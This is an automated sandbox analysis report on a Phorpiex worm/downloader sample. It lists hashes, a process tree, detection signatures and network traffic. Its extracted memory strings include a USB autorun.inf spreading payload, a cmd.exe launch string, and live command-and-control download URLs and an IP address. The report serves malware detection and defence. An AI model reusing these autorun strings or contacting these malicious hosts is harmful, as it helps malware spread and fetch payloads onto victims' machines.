Play interactive tour

Edit tour

Analysis Report Br6Pmt0MiZ.exe

Overview

General Information

Sample Name:	Br6Pmt0MiZ.exe
Analysis ID:	340673
MD5:	85c4f05bdc2c39858288c67d41db3e86
SHA1:	7ccf8a4822b6122a16d7252033da3536145715de
SHA256:	7c419f22e51f37be0c483bbf3c320c40b6939785896b756c504af5de5b46237f
Most interesting Screenshot:

Detection

Phorpiex

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected Phorpiex

Changes security center settings (notifications, updates, antivirus, firewall)

Drops PE files with benign system names

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

May check the online IP address of the machine

Sigma detected: Suspicious Svchost Process

Sigma detected: System File Execution Location Anomaly

Tries to detect the country of the analysis system (by using the IP)

AV process strings found (often used to terminate AV products)

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates files inside the system directory

Dropped file seen in connection with other malware

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

Br6Pmt0MiZ.exe (PID: 5220 cmdline: 'C:\Users\user\Desktop\Br6Pmt0MiZ.exe' MD5: 85C4F05BDC2C39858288C67D41DB3E86)

svchost.exe (PID: 68 cmdline: C:\16642873124159\svchost.exe MD5: 85C4F05BDC2C39858288C67D41DB3E86)

svchost.exe (PID: 5276 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1720 cmdline: 'C:\16642873124159\svchost.exe' MD5: 85C4F05BDC2C39858288C67D41DB3E86)

svchost.exe (PID: 4424 cmdline: 'C:\16642873124159\svchost.exe' MD5: 85C4F05BDC2C39858288C67D41DB3E86)

svchost.exe (PID: 2440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5624 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5628 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5620 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3032 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6200 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6296 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 1156 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6392 cmdline: 'C:\16642873124159\svchost.exe' MD5: 85C4F05BDC2C39858288C67D41DB3E86)

svchost.exe (PID: 6480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6728 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: svchost.exe PID: 68	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: svchost.exe PID: 6392	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: svchost.exe PID: 1720	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: Br6Pmt0MiZ.exe PID: 5220	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: svchost.exe PID: 4424	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\16642873124159\svchost.exe, CommandLine: C:\16642873124159\svchost.exe, CommandLine|base64offset|contains: , Image: C:\16642873124159\svchost.exe, NewProcessName: C:\16642873124159\svchost.exe, OriginalFileName: C:\16642873124159\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\Br6Pmt0MiZ.exe' , ParentImage: C:\Users\user\Desktop\Br6Pmt0MiZ.exe, ParentProcessId: 5220, ProcessCommandLine: C:\16642873124159\svchost.exe, ProcessId: 68

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss: Data: Command: C:\16642873124159\svchost.exe, CommandLine: C:\16642873124159\svchost.exe, CommandLine|base64offset|contains: , Image: C:\16642873124159\svchost.exe, NewProcessName: C:\16642873124159\svchost.exe, OriginalFileName: C:\16642873124159\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\Br6Pmt0MiZ.exe' , ParentImage: C:\Users\user\Desktop\Br6Pmt0MiZ.exe, ParentProcessId: 5220, ProcessCommandLine: C:\16642873124159\svchost.exe, ProcessId: 68

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\16642873124159\svchost.exe, CommandLine: C:\16642873124159\svchost.exe, CommandLine|base64offset|contains: , Image: C:\16642873124159\svchost.exe, NewProcessName: C:\16642873124159\svchost.exe, OriginalFileName: C:\16642873124159\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\Br6Pmt0MiZ.exe' , ParentImage: C:\Users\user\Desktop\Br6Pmt0MiZ.exe, ParentProcessId: 5220, ProcessCommandLine: C:\16642873124159\svchost.exe, ProcessId: 68

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: Br6Pmt0MiZ.exe

Avira: detected

Antivirus detection for URL or domain

Show sources

Source: http://tsrv4.ws/3

Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Show sources

Source: C:\16642873124159\svchost.exe

Avira: detection malicious, Label: TR/Downloader.Gen

Multi AV Scanner detection for domain / URL

Show sources

Source: tldrbox.top	Virustotal: Detection: 12%	Perma Link
Source: tsrv5.top	Virustotal: Detection: 6%	Perma Link
Source: tsrv3.ru	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\16642873124159\svchost.exe	Metadefender: Detection: 44%			Perma Link
Source: C:\16642873124159\svchost.exe	ReversingLabs: Detection: 89%

Multi AV Scanner detection for submitted file

Show sources

Source: Br6Pmt0MiZ.exe	Virustotal: Detection: 87%	Perma Link
Source: Br6Pmt0MiZ.exe	Metadefender: Detection: 44%	Perma Link
Source: Br6Pmt0MiZ.exe	ReversingLabs: Detection: 89%

Machine Learning detection for dropped file

Show sources

Source: C:\16642873124159\svchost.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Br6Pmt0MiZ.exe

Joe Sandbox ML: detected

Source: 18.2.svchost.exe.ab0000.0.unpack	Avira: Label: TR/Downloader.Gen
Source: 18.0.svchost.exe.ab0000.0.unpack	Avira: Label: TR/Downloader.Gen
Source: 6.2.svchost.exe.ab0000.0.unpack	Avira: Label: TR/Downloader.Gen
Source: 0.0.Br6Pmt0MiZ.exe.8b0000.0.unpack	Avira: Label: TR/Downloader.Gen
Source: 1.0.svchost.exe.ab0000.0.unpack	Avira: Label: TR/Downloader.Gen
Source: 1.2.svchost.exe.ab0000.0.unpack	Avira: Label: TR/Downloader.Gen
Source: 0.2.Br6Pmt0MiZ.exe.8b0000.0.unpack	Avira: Label: TR/Downloader.Gen
Source: 6.0.svchost.exe.ab0000.0.unpack	Avira: Label: TR/Downloader.Gen
Source: 8.0.svchost.exe.ab0000.0.unpack	Avira: Label: TR/Downloader.Gen
Source: 8.2.svchost.exe.ab0000.0.unpack	Avira: Label: TR/Downloader.Gen

Location Tracking:

Tries to detect the country of the analysis system (by using the IP)

Show sources

Source: unknown

DNS query: name: api.wipmania.com

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Code function: 0_2_008B16D0 CryptAcquireContextW,	0_2_008B16D0
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Code function: 0_2_008B17D0 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,	0_2_008B17D0
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Code function: 0_2_008B16F0 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,	0_2_008B16F0
Source: C:\16642873124159\svchost.exe	Code function: 1_2_00AB16D0 CryptAcquireContextW,	1_2_00AB16D0
Source: C:\16642873124159\svchost.exe	Code function: 1_2_00AB16F0 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,	1_2_00AB16F0
Source: C:\16642873124159\svchost.exe	Code function: 1_2_00AB17D0 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,	1_2_00AB17D0

Phishing:

Yara detected Phorpiex

Show sources

Source: Yara match	File source: Process Memory Space: svchost.exe PID: 68, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6392, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1720, type: MEMORY
Source: Yara match	File source: Process Memory Space: Br6Pmt0MiZ.exe PID: 5220, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4424, type: MEMORY

Source: Br6Pmt0MiZ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Br6Pmt0MiZ.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Br6Pmt0MiZ.exe	Binary or memory string: %s\autorun.inf
Source: Br6Pmt0MiZ.exe	Binary or memory string: autorun.inf
Source: Br6Pmt0MiZ.exe	Binary or memory string: [AuToRuN] ShEllExECutE=__\DriveMgr.exe UsEAuToPLaY=1
Source: Br6Pmt0MiZ.exe	Binary or memory string: [AuToRuN]ShEllExECutE=__\DriveMgr.exeUsEAuToPLaY=1
Source: Br6Pmt0MiZ.exe, 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: Br6Pmt0MiZ.exe, 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: Br6Pmt0MiZ.exe, 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp	Binary or memory string: UsEAuToPLaY=1.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll*.vbeautorun.inf...%s\%s%s\%s%s\%s\%sopenTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36tyu6uyursvchost.exehttp://tsrv3.ru/Host Process for Windows Serviceshttp://185.215.113.10/http://tsrv4.ws/http://tsrv5.top/http://thaus.ws/http://zzruuoooshfrohu.su/http://tldrbox.top/http://thaus.ws/123456%systemdrive%%userprofile%%temp%
Source: svchost.exe	Binary or memory string: %s\autorun.inf
Source: svchost.exe	Binary or memory string: autorun.inf
Source: svchost.exe	Binary or memory string: [AuToRuN] ShEllExECutE=__\DriveMgr.exe UsEAuToPLaY=1
Source: svchost.exe	Binary or memory string: [AuToRuN]ShEllExECutE=__\DriveMgr.exeUsEAuToPLaY=1
Source: svchost.exe, 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: svchost.exe, 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: svchost.exe, 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: UsEAuToPLaY=1.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll*.vbeautorun.inf...%s\%s%s\%s%s\%s\%sopenTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36tyu6uyursvchost.exehttp://tsrv3.ru/Host Process for Windows Serviceshttp://185.215.113.10/http://tsrv4.ws/http://tsrv5.top/http://thaus.ws/http://zzruuoooshfrohu.su/http://tldrbox.top/http://thaus.ws/123456%systemdrive%%userprofile%%temp%
Source: svchost.exe, 00000006.00000002.270498019.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: svchost.exe, 00000006.00000002.270498019.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: svchost.exe, 00000006.00000002.270498019.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: UsEAuToPLaY=1.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll*.vbeautorun.inf...%s\%s%s\%s%s\%s\%sopenTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36tyu6uyursvchost.exehttp://tsrv3.ru/Host Process for Windows Serviceshttp://185.215.113.10/http://tsrv4.ws/http://tsrv5.top/http://thaus.ws/http://zzruuoooshfrohu.su/http://tldrbox.top/http://thaus.ws/123456%systemdrive%%userprofile%%temp%
Source: svchost.exe, 00000008.00000002.289859057.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: svchost.exe, 00000008.00000002.289859057.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: svchost.exe, 00000008.00000002.289859057.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: UsEAuToPLaY=1.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll*.vbeautorun.inf...%s\%s%s\%s%s\%s\%sopenTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36tyu6uyursvchost.exehttp://tsrv3.ru/Host Process for Windows Serviceshttp://185.215.113.10/http://tsrv4.ws/http://tsrv5.top/http://thaus.ws/http://zzruuoooshfrohu.su/http://tldrbox.top/http://thaus.ws/123456%systemdrive%%userprofile%%temp%
Source: svchost.exe, 00000012.00000000.295746460.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: svchost.exe, 00000012.00000000.295746460.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: svchost.exe, 00000012.00000000.295746460.0000000000AB6000.00000002.00020000.sdmp	Binary or memory string: UsEAuToPLaY=1.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll*.vbeautorun.inf...%s\%s%s\%s%s\%s\%sopenTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36tyu6uyursvchost.exehttp://tsrv3.ru/Host Process for Windows Serviceshttp://185.215.113.10/http://tsrv4.ws/http://tsrv5.top/http://thaus.ws/http://zzruuoooshfrohu.su/http://tldrbox.top/http://thaus.ws/123456%systemdrive%%userprofile%%temp%
Source: Br6Pmt0MiZ.exe	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: Br6Pmt0MiZ.exe	Binary or memory string: %temp%%ls\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifier\??\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDrives%windir%\system32\cmd.exe/c start __ & __\DriveMgr.exe & exit%s\...%s\%s%s\%s__%s.lnk%s\%s\DriveMgr.exe%s\%s%s\%s%s\%s\autorun.infshell32.dllshell32.dllw*.lnk[AuToRuN]
Source: Br6Pmt0MiZ.exe	Binary or memory string: UsEAuToPLaY=1.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll*.vbeautorun.inf...%s\%s%s\%s%s\%s\%sopenTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36tyu6uyursvchost.exehttp://tsrv3.ru/Host Process for Windows Serviceshttp://185.215.113.10/http://tsrv4.ws/http://tsrv5.top/http://thaus.ws/http://zzruuoooshfrohu.su/http://tldrbox.top/http://thaus.ws/123456%systemdrive%%userprofile%%temp%

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Code function: 0_2_008B1F80 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_008B1F80
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Code function: 0_2_008B20C0 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,PathFileExistsW,_wfopen,fwprintf,fclose,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	0_2_008B20C0
Source: C:\16642873124159\svchost.exe	Code function: 1_2_00AB1F80 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00AB1F80
Source: C:\16642873124159\svchost.exe	Code function: 1_2_00AB20C0 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,PathFileExistsW,_wfopen,fwprintf,fclose,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	1_2_00AB20C0

Networking:

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: api.wipmania.com
Source: unknown	DNS query: name: api.wipmania.com
Source: unknown	DNS query: name: api.wipmania.com
Source: unknown	DNS query: name: api.wipmania.com
Source: unknown	DNS query: name: api.wipmania.com

Source: Joe Sandbox View	IP Address: 212.83.168.196 212.83.168.196
Source: Joe Sandbox View	IP Address: 64.70.19.203 64.70.19.203

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View	ASN Name: CENTURYLINK-LEGACY-SAVVISUS CENTURYLINK-LEGACY-SAVVISUS

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: api.wipmania.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: api.wipmania.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: api.wipmania.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: api.wipmania.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: api.wipmania.com
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
